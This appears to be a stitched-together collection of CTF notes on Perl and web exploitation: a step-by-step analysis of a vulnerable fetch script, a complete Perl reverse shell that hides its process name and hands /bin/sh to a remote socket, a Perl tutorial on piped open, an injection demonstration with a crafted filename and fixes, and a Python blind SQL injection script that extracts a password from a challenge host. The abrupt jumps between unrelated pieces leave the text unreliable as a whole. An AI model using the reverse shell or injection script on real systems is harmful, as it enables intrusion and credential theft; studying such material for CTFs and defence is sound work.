What the vulnerable script does, step by step:

1. A sandbox directory is created from REMOTE_ADDR.
2. The URL passed in is substituted into the GET command and executed. GET here is the command-line client from Lib for WWW in Perl (LWP); its purpose is to issue an HTTP GET request.
3. The filename parameter is parsed with pathinfo(); the last directory component of that path is created and the script changes into it.
4. basename() takes the final component of the filename parameter, i.e. the file name itself.
5. file_put_contents() writes the output of the GET command into a file with that name.
```perl
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 12345;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any
                # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}
```
Executing Programs with “open”

In addition to what we saw last week, the “open” command has one more very powerful application: it allows you to execute a command, send input and receive output. Try this program (it only works on Unix):

```perl
#!/usr/bin/perl -w
use strict;

# A trailing "|" tells open to run "who" and read its standard output
open DATA, "who |" or die "Couldn't execute program: $!";
while ( defined( my $line = <DATA> ) ) {
    chomp($line);
    print "$line\n";
}
close DATA;
```
Here’s what happened: Perl saw that your “file” ended with a “pipe” (vertical bar) character. So it interpreted the “file” as a command to be executed, and interpreted the command’s output as the “file”’s contents. The command is “who” (which prints information on currently logged-in users). If you execute that command, you will see that the output is exactly what the Perl program gave you.

In this case, we “read” data from the command. To execute a command that we can “write” (send data) to, we should place a pipe character BEFORE the command. With a single “open” these options are mutually exclusive: we can read from a command or write to it, but not both (two-way communication with a child process needs the core IPC::Open2 or IPC::Open3 modules instead).
In the Unix world, a lot can be done by piping the output of one program into the input of another. Perl continues this spirit.
Note that we can also send command-line parameters to the command, like this:
```perl
open DATA, "who -H |" or die "Couldn't execute program: $!";
```
In fact, Perl allows you to use “open” to do pretty much anything you would normally do on the command-line, as this example demonstrates:
```perl
open OUTPUT, "| grep 'foo' > result.txt" or die "Failure: $!";
```
We can then write whatever we want to the “OUTPUT” filehandle. The Unix “grep” command will filter out any text which doesn’t contain the text “foo”; any text which DOES contain “foo” will be written to “result.txt”.
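The property the tutorial describes is the one that makes step 2 of the analysis above dangerous if any part of the URL reaches a two-argument open: the string is parsed as a mode specification, so a name that ends in a pipe is executed rather than opened. The script below is an added example, not code from the tutorial, the writeup or the challenge; the hostile file name and the commands it runs are constructed for the demonstration. It shows the read-from-command and write-to-command forms side by side with the three-argument open, which takes the name literally, and the list form of open, which starts a program without a shell.

```perl
#!/usr/bin/perl
# Added example: two-argument open interprets the string, three-argument
# open does not. The inputs below are constructed for the demonstration.
use strict;
use warnings;

$| = 1;  # unbuffered stdout so our prints and the child's output interleave in order

# Two-argument open: the string is a mode specification. A trailing "|"
# means "run this as a shell command and read its stdout"; leading "<",
# ">", ">>", "|" and surrounding whitespace are interpreted the same way.
sub read_two_arg {
    my ($spec) = @_;
    open(my $fh, $spec) or return "open failed: $!\n";
    my $data = do { local $/; <$fh> };   # slurp everything
    close($fh);
    return $data;
}

# Three-argument open: the mode is the separate '<' argument, so the name
# is opened as a plain file no matter which characters it contains.
sub read_three_arg {
    my ($name) = @_;
    open(my $fh, '<', $name) or return "open failed: $!\n";
    my $data = do { local $/; <$fh> };
    close($fh);
    return $data;
}

# Constructed attacker-style input: looks like a file name, ends in "|".
my $hostile = 'echo EXECUTED; id |';

print "two-arg:   ", read_two_arg($hostile);    # runs "echo EXECUTED; id"
print "three-arg: ", read_three_arg($hostile);  # ENOENT, nothing is run

# Writing to a command (leading "|"): everything printed to $out becomes
# the command's standard input.
open(my $out, '| tr a-z A-Z') or die "Failure: $!";
print $out "piped through tr\n";
close($out);                                     # prints "PIPED THROUGH TR"

# When a command must be run with user-supplied arguments, the list form
# starts the program directly with no shell, so metacharacters in the
# arguments stay literal instead of being parsed.
my @cmd = ('printf', '%s\n', 'arg with ; and | inside');
open(my $safe, '-|', @cmd) or die "exec failed: $!";
print "list form: ", <$safe>;
close($safe);
```

The two fixes a practitioner should take from this are the same ones that apply to the GET step of the analysis: never let untrusted text reach a two-argument open, and when a command has to be run, use the list form (or a validated, fixed program path) so that no shell parses the argument.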
```python
import requests
import time

# Boolean-based blind extraction of the password, one character at a time,
# using a binary search over the printable ASCII range. The oracle is the
# response: a true condition yields a response without a Content-Length
# header, a false one yields a response with it.
name = ''
for j in range(1, 21):
    l = 32
    h = 127
    while abs(l - h) > 1:
        i = int((l + h) / 2)
        url = ("http://a215b254-c237-4670-a4cc-9dfea3d34f26.node3.buuoj.cn/image.php?id=\\0'&path= or ascii(substr((select password from users),"
               + str(j) + ",1))>" + str(i) + "%23")
        r = requests.get(url)
        time.sleep(0.005)
        if r.status_code == 429:  # rate limited; the original compared against the string '429', which never matched
            print('too fast')
            time.sleep(1)
            continue              # retry the same midpoint instead of using the throttled response as the oracle
        if 'Content-Length' not in r.headers:
            l = i                 # condition true: character is above the midpoint
        else:
            h = i                 # condition false: character is at or below the midpoint
    name += chr(h)
    print(name)
```